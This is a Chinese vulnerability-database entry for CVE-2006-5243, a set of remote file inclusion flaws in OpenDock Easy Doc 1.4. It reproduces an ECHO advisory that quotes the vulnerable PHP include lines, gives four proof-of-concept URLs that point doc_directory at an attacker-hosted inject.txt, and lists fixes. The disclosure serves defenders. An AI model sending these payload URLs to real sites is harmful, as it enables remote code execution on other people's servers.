OpenDock Easy Doc 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111223 漏洞类型 输入验证
发布时间 2006-10-09 更新时间 2006-10-20
CVE编号 CVE-2006-5243 CNNVD-ID CNNVD-200610-176
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2494
https://cxsecurity.com/issue/WLB-2006100079
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-176
|漏洞详情
OpenDockEasyDoc1.4以及之前的版本,在启用register_globals的情况下,其存在多个PHP远程文件包含漏洞,远程攻击者可以通过sw/lib_up_file/中的(1)down_stat.php,(2)file.php,(3)find_file.php,(4)lib_file.php和(5)lib_form_file.php;sw/lib_comment/中的(6)find_comment.php,(7)comment.php和(8)lib_comment.php;以及(9)sw/lib_find/find.php中的doc_directory参数包含的URL和其他未明向量来执行任意PHP代码。
|漏洞EXP
ECHO_ADV_49$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_49$2006]OpenDock Easy Doc <=1.4 (doc_directory) Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author          : Dedi Dwianto a.k.a the_day
Date Found      : October, 09th 2006
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv49-theday-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application     : OpenDock Easy Doc
version         : <=1.4
URL             : http://web.opendock.net

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

In folder sw/lib_up_file/ I found vulnerability script file.php
--------------------------file.php---------------------------------------
....
<?

 include $doc_directory.$path_sw."lib_up_file/lib_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_form_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_read_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_page_file.php";
 include $doc_directory.$path_sw."lib_up_file/find_file.php";
 include $doc_directory.$path_sw."lib_up_file/down_stat.php";

...
----------------------------------------------------------

Input passed to the "$doc_directory" parameter in file.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

sw/lib_up_file/down_stat.php
sw/lib_up_file/file.php
sw/lib_up_file/find_file.php
sw/lib_up_file/lib_file.php
sw/lib_up_file/lib_form_file.php
sw/lib_comment/find_comment.php
sw/lib_comment/comment.php
sw/lib_comment/lib_comment.php
sw/lib_find/find.php
etc..



Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[OpenDockEasyDock_Path]/sw/lib_up_file/file.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyDock_Path]/sw/lib_up_file/find_file.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyDock_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyDock_Path]/sw/lib_find/find.php?doc_directory=http://attacker.com/inject.txt?

Solution:
~~~~~~
- Sanitize variable $doc_directory on affected files.
- Turn off register_globals

Timeline:
~~~~~~
09 - 10 - 2006 Bugs Found
09 - 10 - 2006 Vendor Contact
09 - 10 - Public Disclosure

---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,boom_3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
    EcHo Research & Development Center
    the_day[at]echo[dot]or[dot]id

# milw0rm.com [2006-10-09]
|参考资料

来源:XF
名称:opendock-doc-directory-file-include(29404)
链接:http://xforce.iss.net/xforce/xfdb/29404
来源:BID
名称:20407
链接:http://www.securityfocus.com/bid/20407
来源:BUGTRAQ
名称:20061009[ECHO_ADV_49$2006]OpenDockEasyDoc<=1.4(doc_directory)MultipleRemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/448010/100/0/threaded
来源:VUPEN
名称:ADV-2006-3971
链接:http://www.frsirt.com/english/advisories/2006/3971
来源:SECTRACK
名称:1017022
链接:http://securitytracker.com/id?1017022
来源:SECUNIA
名称:22334
链接:http://secunia.com/advisories/22334
来源:MISC
链接:http://advisories.echo.or.id/adv/adv49-theday-2006.txt
来源:SREASON
名称:1715
链接:http://securityreason.com/securityalert/1715